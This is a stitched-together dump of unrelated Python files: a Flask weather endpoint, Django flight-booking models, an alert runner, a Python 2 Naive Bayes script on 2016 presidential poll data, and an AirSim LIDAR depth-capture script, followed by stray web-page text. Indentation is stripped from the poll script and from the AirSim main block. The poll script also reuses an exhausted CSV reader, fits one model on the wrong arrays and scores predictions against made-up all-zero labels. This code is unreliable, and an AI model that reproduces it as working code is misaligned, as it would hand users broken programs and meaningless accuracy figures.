    if state == 'Test' and dist == 'Test':
        return jsonify({_keyNameTemperature: [{'y1': 'Test'}], _keyNameHumidity: [{'y1': 'Test'}],
                        _keyNameRainfall: [{'y1': 'Test'}, ]})
    res = {}
    try:
        rain = fetch_rainfall_whole_data(state, dist)
        temp = fetch_temp_whole_data(state, dist)
        humidity = fetch_humidity_whole_data(state, dist)
        res[_keyNameTemperature] = temp
        res[_keyNameHumidity] = humidity
        res[_keyNameRainfall] = rain
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate; any data-fetch failure is reported as 404.
        return jsonify({'message': 'The requested location cannot be processed'}), 404
    return jsonify(res), 200
# Uncomment when running locally
# app.run(port=4999)
# Uncomment when pushing to GCP
# if __name__ == "__main__":
# app.run(host='0.0.0.0', port=4999, debug=True)
|
from django.db import models
# Create your models here.
class passengers(models.Model):
    # One flight search submitted by a user: origin, destination, date and
    # party size (party size is stored as free text, not an integer).
    From=models.CharField(max_length=50)  # origin; capitalised because "from" is a Python keyword
    To=models.CharField(max_length=50)  # destination
    Date=models.DateField()  # travel date
    no_of_people=models.CharField(max_length=20)  # number of travellers, kept as text
class flit(models.Model):
    # A bookable flight ("flit" — presumably a shortening/typo of "flight").
    name=models.CharField(max_length=50)  # flight/airline name
    no=models.IntegerField()  # flight number
    fare=models.IntegerField()  # ticket price (currency unit not stated here — confirm)
    time=models.CharField(max_length=50)  # departure time, free-form text
    image=models.ImageField()  # display image for the flight
class food(models.Model):
    # An in-flight meal option that can be added to a booking.
    name=models.CharField(max_length=50)  # dish name
    no=models.IntegerField()  # item number / identifier
    food_cost=models.IntegerField()  # price of the item (currency unit not stated here — confirm)
    image=models.ImageField()  # display image for the dish
|
from src.common import database
from src.models.alerts import alert

# One-shot alert runner: open the database connection, then evaluate all
# stored alerts once. Presumably invoked on a schedule (e.g. cron) — confirm.
database.Database.initialize()
alert.check_alerts()
|
from sklearn.naive_bayes import GaussianNB
import numpy as np
from scipy import stats
from sklearn.metrics import jaccard_similarity_score
from numpy import array
from sklearn.metrics import accuracy_score
#assigning predictor and target variables
import csv
reader = csv.DictReader(open('presidential_polls.csv', 'rU'))
myList =[]
myList1=[]
VL=[]
VL1=[]
V2L =[]
V2L1=[]
V3L1=[]
V3L=[]
V4L=[]
V4L1=[]
V5L1=[]
V5L =[]
for row in reader:
if float(row['adjpoll_clinton']) > float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) > float(row['rawpoll_trump']):
myList.append([1.00,0.00])
myList1.append(1.00)
elif float(row['adjpoll_clinton']) < float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) < float(row['rawpoll_trump']):
myList.append([0.00, 1.00])
myList1.append(0.00)
x= array(myList)
z= array(myList1)
y = z.flat
print type(y)
print y
model = GaussianNB()
model.fit(x,y)
predicted = model.predict([[0,0],[0,1],[1,1],[1,0]])
print predicted
print accuracy_score([0,0,0,0],predicted)
print jaccard_similarity_score([0,0,0,0],predicted)
print "The mean error is:"
print stats.sem(myList, axis=None, ddof=0)
for row in reader:
if row['grade']=="A+" or row['grade']=="A":
if float(row['adjpoll_clinton']) > float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) > float(row['rawpoll_trump']):
VL.append([1.00,0.00])
VL1.append(1.00)
elif float(row['adjpoll_clinton']) < float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) < float(row['rawpoll_trump']):
VL.append([0.00, 1.00])
VL1.append(0.00)
print VL
print VL1
x1= array(VL)
z1= array(VL1)
y1 = z1.flat
model1 = GaussianNB()
model1.fit(x,y)
predicted1 = model1.predict([[0,0],[0,1],[1,1],[1,0]])
print predicted1
print accuracy_score([0,0,0,0],predicted1)
print jaccard_similarity_score([0,0,0,0],predicted1)
print "The mean error is:"
print stats.sem(VL, axis=None, ddof=0)
for row in reader:
if row['grade']=="A-" or row['grade']=="B+":
if float(row['adjpoll_clinton']) > float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) > float(row['rawpoll_trump']):
V2L.append([1.00,0.00])
V2L1.append(1.00)
elif float(row['adjpoll_clinton']) < float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) < float(row['rawpoll_trump']):
V2L.append([0.00, 1.00])
V2L1.append(0.00)
x2= array(V2L)
z2= array(V2L1)
y2 = z2.flat
model2 = GaussianNB()
model2.fit(x2,y2)
predicted2 = model2.predict([[0,0],[0,1],[1,1],[1,0]])
print predicted2
print accuracy_score([0,0,0,0],predicted2)
print jaccard_similarity_score([0,0,0,0],predicted2)
print "The mean error is:"
print stats.sem(V2L, axis=None, ddof=0)
for row in reader:
if row['grade']=="B" or row['grade']=="B-":
if float(row['adjpoll_clinton']) > float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) > float(row['rawpoll_trump']):
V3L.append([1.00,0.00])
V3L1.append(1.00)
elif float(row['adjpoll_clinton']) < float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) < float(row['rawpoll_trump']):
V3L.append([0.00, 1.00])
V3L1.append(0.00)
x3= array(V3L)
z3= array(V3L1)
y3 = z3.flat
model3 = GaussianNB()
model3.fit(x3,y3)
predicted3 = model3.predict([[0,0],[0,1],[1,1],[1,0]])
print predicted3
print accuracy_score([0,0,0,0],predicted3)
print jaccard_similarity_score([0,0,0,0],predicted3)
print "The mean error is:"
print stats.sem(V3L, axis=None, ddof=0)
for row in reader:
if row['grade']=="C+" or row['grade']=="C":
if float(row['adjpoll_clinton']) > float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) > float(row['rawpoll_trump']):
V4L.append([1.00,0.00])
V4L1.append(1.00)
elif float(row['adjpoll_clinton']) < float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) < float(row['rawpoll_trump']):
V4L.append([0.00, 1.00])
V4L1.append(0.00)
x4= array(V4L)
z4= array(V4L1)
y4 = z4.flat
model4 = GaussianNB()
model4.fit(x4,y4)
predicted4 = model4.predict([[0,0],[0,1],[1,1],[1,0]])
print predicted4
print accuracy_score([0,0,0,0],predicted4)
print jaccard_similarity_score([0,0,0,0],predicted4)
print "The mean error is:"
print stats.sem(V4L, axis=None, ddof=0)
for row in reader:
if row['grade']=="C-" or row['grade']=="":
if float(row['adjpoll_clinton']) > float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) > float(row['rawpoll_trump']):
V5L.append([1.00,0.00])
V5L1.append(1.00)
elif float(row['adjpoll_clinton']) < float(row['adjpoll_trump']) and float(row['rawpoll_clinton']) < float(row['rawpoll_trump']):
V5L.append([0.00, 1.00])
V5L1.append(0.00)
x5= array(V5L)
z5= array(V5L1)
y5 = z5.flat
model5 = GaussianNB()
model5.fit(x5,y5)
predicted5 = model5.predict([[0,0],[0,1],[1,1],[1,0]])
print predicted5
print accuracy_score([0,0,0,0],predicted5)
print jaccard_similarity_score([0,0,0,0],predicted5)
print "The mean error is:"
print stats.sem(V5L, axis=None, ddof=0) |
from __future__ import print_function
import argparse
import numpy as np
import os
import time
import airsim
from airsim.types import Pose, Vector3r, Quaternionr
from airsim import utils as sim_util
from airsim.utils import to_quaternion
AS_CAM_ID = 1
def handle_arguments(parser):
    """Register this script's CLI options on *parser* and parse sys.argv.

    Returns the parsed argparse.Namespace with `pose` and `out_dir`.
    """
    options = (
        ("--pose",
         "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0",
         "The spatial pose of the first camera. 3-element xyz and 4-element quaternion with the last being w."),
        ("--out-dir",
         "./",
         "The output directory."),
    )
    for flag, default, text in options:
        parser.add_argument(flag, type=str, default=default, help=text)
    return parser.parse_args()
def convert_pose_string_2_array(s):
    """
    Parse a comma-separated string of numbers into a 1-D float64 array.

    s is assumed to be in the form "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0";
    whitespace around the commas is ignored.
    """
    # np.fromstring(..., sep=",") is deprecated for text parsing; an explicit
    # split also raises a clear ValueError on malformed tokens instead of
    # silently truncating.
    return np.array([float(tok) for tok in s.split(",")], dtype=np.float64)
def convert_2_pose(p, e):
    """
    Build an AirSim Pose from a position and Euler angles.

    p: A 3-element NumPy array, the position (x, y, z).
    e: A 3-element array of Euler angles passed straight to to_quaternion
       (presumably pitch, roll, yaw per airsim.utils.to_quaternion — confirm).
       NOTE(review): the previous docstring described a 4-element quaternion
       'q', which did not match this parameter.
    """
    return Pose( Vector3r( p[0], p[1], p[2] ), to_quaternion( e[0], e[1], e[2] ) )
class CamControl(object):
    """Wrapper around an AirSim VehicleClient for capturing planar depth images.

    camID: the AirSim camera to request images from.
    distLimit: depth values beyond this are clamped to the limit.
    """

    def __init__(self, camID, distLimit=10000):
        super(CamControl, self).__init__()
        self.camID = camID
        self.cmdClient = None  # set by initialize()
        self.imgType = None    # image request list, set by initialize()
        self.distLimit = distLimit
        self.maxTrial = 2      # capture retries per face; simGetImages may return empty

    def initialize(self):
        # Connect to AirSim and prepare the planar-depth image request.
        self.cmdClient = airsim.VehicleClient()
        self.cmdClient.confirmConnection()
        self.imgType = [ airsim.ImageRequest( self.camID, airsim.ImageType.DepthPlanner, True ) ]

    def get_depth_campos(self):
        '''
        Capture one depth image and the camera pose.

        Returns (depth, cam_pose); depth is a 2-D float array clamped to
        self.distLimit, cam_pose is
        0: [x_val, y_val, z_val] 1: [x_val, y_val, z_val, w_val].
        Returns (None, None) when the request yields no image.
        '''
        imgRes = self.cmdClient.simGetImages(self.imgType)
        if imgRes is None or imgRes[0].width == 0:  # Sometimes the request returns no image
            return None, None
        depthFront = sim_util.list_to_2d_float_array(
            imgRes[0].image_data_float,
            imgRes[0].width, imgRes[0].height )
        depthFront[depthFront > self.distLimit] = self.distLimit
        camPose = ( imgRes[0].camera_position, imgRes[0].camera_orientation )
        return depthFront, camPose

    def set_vehicle_pose(self, pose, ignoreCollison=True, vehicleName=""):
        # simSetVehiclePose is intended for Computer Vision mode.
        self.cmdClient.simSetVehiclePose( pose, ignoreCollison, vehicleName )
        time.sleep(0.1)  # let the simulator settle before the next capture

    def capture_LIDAR_depth(self, p, q):
        """
        Capture four depth images (front, right, back, left) at one pose.

        p: A 3-element NumPy array, the position.
        q: A 4-element NumPy array, quaternion, w is the last element.
        Raises Exception when a face still has no image after maxTrial tries.
        """
        faces = [ 0, 1, 2, -1 ]  # Front, right, back, left.
        depthList = []
        q0 = Quaternionr(q[0], q[1], q[2], q[3])
        for face in faces:
            # Rotate the base orientation by a multiple of 90 degrees in yaw.
            yaw = np.pi / 2 * face
            yq = to_quaternion( 0, 0, yaw )
            q1 = yq * q0
            pose = Pose( Vector3r( p[0], p[1], p[2] ), q1 )
            self.set_vehicle_pose(pose)
            # BUG FIX: the original retry loop never broke on success, so a
            # good capture could be overwritten by a later failed trial (and
            # every face always paid for maxTrial captures). Stop retrying as
            # soon as a valid depth arrives.
            depth = None
            for i in range(self.maxTrial):
                depth, _ = self.get_depth_campos()
                if depth is not None:
                    break
                print("Fail for trial %d on face %d. " % ( i, face ))
            if depth is None:
                raise Exception("Could not get depth image for face %d. " % ( face ))
            depthList.append(depth)
        return depthList
def save_depth_list(fn, depthList):
    """Save the four per-face depth arrays to one compressed .npz file.

    fn: output path; missing parent directories are created.
    depthList: exactly 4 arrays (front, right, back, left).
    Raises Exception when the list does not hold exactly 4 entries.
    """
    if ( len(depthList) != 4 ):
        raise Exception("Expecting the depths in the list to be 4. len(depthList) = %d. " % ( len(depthList) ))
    # Ensure the output directory exists. BUG FIX: guard against an empty
    # dirname — os.makedirs('') raises for a bare filename like "out.npz".
    dirName = os.path.split(fn)[0]
    if dirName and not os.path.isdir(dirName):
        os.makedirs(dirName)
    np.savez( fn, d0=depthList[0], d1=depthList[1], d2=depthList[2], d3=depthList[3] )
if __name__ == "__main__":
print("Capture depth images for simulating LIDAR.")
parser = argparse.ArgumentParser(description="Capture depth images for simulating LIDAR.")
args = handle_arguments(parser)
cc = CamControl(AS_CAM_ID)
cc.initialize()
a = convert_pose_string_2_array( args.pose )
if ( a.size != 7 ):
raise Exception("Get pose = {}. ".format( a ))
depthList = cc.capture_LIDAR_depth( a[:3], a[3:] )
# Save the depth to filesystem.
save_depth_list("%s/LIDARDepth.npz" % (args.out_dir), depthList)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.